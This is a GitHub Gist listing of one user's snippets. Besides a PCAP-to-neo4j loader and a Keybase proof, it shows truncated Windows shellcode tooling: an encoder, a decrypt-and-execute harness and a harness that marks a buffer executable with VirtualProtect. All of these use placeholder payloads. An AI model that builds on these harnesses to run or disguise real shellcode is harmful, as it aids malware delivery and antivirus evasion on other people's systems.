Skip to content

Instantly share code, notes, and snippets.

@multiplex3r
multiplex3r / loadPcap.py
Last active August 21, 2023 23:36
Load a PCAP into neo4j with scapy
#!/usr/bin/env python3
from scapy.all import *
from py2neo import Graph, Node, Relationship
packets = rdpcap("<your_pcap_file>")
g = Graph(password="<your_neo4j_password>")
for packet in packets.sessions():
pkt = packet.split()
@multiplex3r
multiplex3r / enc_harness.c
Created August 31, 2017 02:35
Decrypt and execute harness
#include <windows.h>
unsigned char buf[] =
"your"
"encrypted"
"shellcode"
"here";
char* decryptPayload(){
@multiplex3r
multiplex3r / encoder.py
Created August 31, 2017 02:33
Shellcode encoder
#!/usr/bin/env python
import sys
def chunks(l, n):
for i in range(0, len(l), n):
yield l[i:i + n]
shellcode = "your"
shellcode += "shellcode"
shellcode += "here"
@multiplex3r
multiplex3r / harness.c
Created August 31, 2017 02:19
Shellcode harness
#include <windows.h>
unsigned char buf[] =
"your"
"shellcode"
"here";
void executePayload(){
DWORD pewpewpew;
VirtualProtect(buf, sizeof(buf),PAGE_EXECUTE_READWRITE, &pewpewpew);
@multiplex3r
multiplex3r / popup.c
Created August 31, 2017 02:17
Replacement for calc.exe in wine :)
#include <windows.h>
#include <winbase.h>
void main(){
MessageBox(0,"You have been pwnd!","Pwnd!",1);
}

Keybase proof

I hereby claim:

  • I am multiplex3r on github.
  • I am multiplex3r (https://keybase.io/multiplex3r) on keybase.
  • I have a public key whose fingerprint is DFDF F47F 4C00 076C 2C82 A834 6716 6CA8 F415 CCB5

To claim this, I am signing this object: